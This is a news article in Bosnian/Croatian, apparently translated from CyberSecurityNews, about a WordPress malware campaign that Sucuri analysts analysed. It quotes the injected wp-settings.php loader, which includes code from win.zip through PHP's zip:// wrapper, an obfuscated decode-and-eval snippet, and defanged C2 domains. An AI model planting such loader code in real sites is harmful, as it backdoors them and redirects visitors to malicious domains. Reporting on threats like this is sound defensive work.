Istraživači sajber sigurnosti otkrili su sofisticiranu kampanju malicioznog softvera usmjerenu na WordPress web stranice putem genijalnog mehanizma napada zasnovanog na ZIP arhivi.
Maliciozni softver, o kojem je prvi put prijavljeno u julu 2025. godine, predstavlja značajnu evoluciju u web prijetnjama, koristeći napredne tehnike zamagljivanja i prikrivene metode perzistentnosti kako bi preusmjerio nesuđene posjetioce na maliciozne domene, a istovremeno provodi operacije trovanja optimizacije za pretraživače .
Napad počinje kompromitacijom osnovnih WordPress datoteka, posebno ciljajući kritičnu komponentu wp-settings.php.
.webp)
Nakon što se dobije pristup, napadači ubrizgavaju maliciozni kod koji koristi PHP-ovu zip:// funkcionalnost omotača za izvršavanje skrivenih korisnih podataka.
Ovaj pristup omogućava da zlonamjerni softver ostane praktično neotkriven od strane tradicionalnih sigurnosnih skenera , jer se maliciozni kod pohranjuje unutar onoga što izgleda kao bezopasna ZIP arhivska datoteka pod nazivom win.zip.
Primarni ciljevi malicioznog softvera prevazilaze jednostavne šeme preusmjeravanja. On orkestrira sveobuhvatan napad na rangiranje na pretraživačima putem neovlaštenog ubrizgavanja sadržaja, manipulacije mapama web-mjesta i kreiranja stranica pretrpanih neželjenom poštom, osmišljenih da poboljšaju vidljivost malicioznih web-mjesta u rezultatima pretrage.
Infekcija pokazuje izuzetnu sofisticiranost u svojoj sposobnosti razlikovanja ljudskih posjetilaca od automatizovanih botova, osiguravajući da roboti pretraživača naiđu na benigni sadržaj dok su stvarni korisnici izloženi malicioznim preusmjeravanjima.
Analitičari Sucurija identifikovali su maliciozni softver nakon istraživanja stalnih problema s preusmjeravanjem koje je prijavio klijent, što je dovelo do otkrića ove višeslojne prijetnje.
Istraživači su primijetili da maliciozni softver koristi dinamički odabir Command and Control servera, s različitim C2 domenama aktiviranim na osnovu specifičnih URL obrazaca kojima pristupaju posjetioci.
Mehanizam uključivanja ZIP arhive
Najinovativnija karakteristika malicioznog softvera leži u iskorištavanju PHP-ovog zip:// stream wrappera za uključivanje koda. Početni payload, ubrizgan u wp-settings.php, sadrži dvije ključne linije koje uspostavljaju okvir zaraze: –
$h = str_replace('www.', '', $_SERVER['HTTP_HOST']);
include('zip://win.zip#' . $h);Ovaj kod izdvaja naziv domene iz HTTP_HOST zaglavlja i koristi ga za direktno uključivanje datoteke iz win.zip arhive.
.webp)
Ova tehnika zaobilazi tradicionalne metode detekcije zasnovane na datotekama jer se maliciozni kod nalazi unutar komprimovanog kontejnera, a ne kao samostalne PHP datoteke.
Nakon ekstrakcije, ZIP arhiva otkriva jako zamućen PHP kod strukturiran kao: –
$encode=$b3($string);
$string1=$b2($b4($encode));
echo eval("?>" . $string1);Zlonamjerni softver uspostavlja perzistentnost putem manipulacije okruženjem, postavljanja produženih vremenskih ograničenja izvršavanja i implementacije mehanizama za detekciju botova.
.webp)
Dinamički bira između više Command and Control servera, uključujući domene kao što su wditemqy[.]enturbioaj[.]xyz i oqmetrix[.]icercanokt[.]xyz, ovisno o traženoj URL putanji.
Ova distribuisana C2 arhitektura poboljšava otpornost malicioznog softvera na pokušaje uklanjanja, a istovremeno omogućava ciljanu isporuku sadržaja na osnovu obrazaca ponašanja posjetilaca.
Izvor: CyberSecurityNews
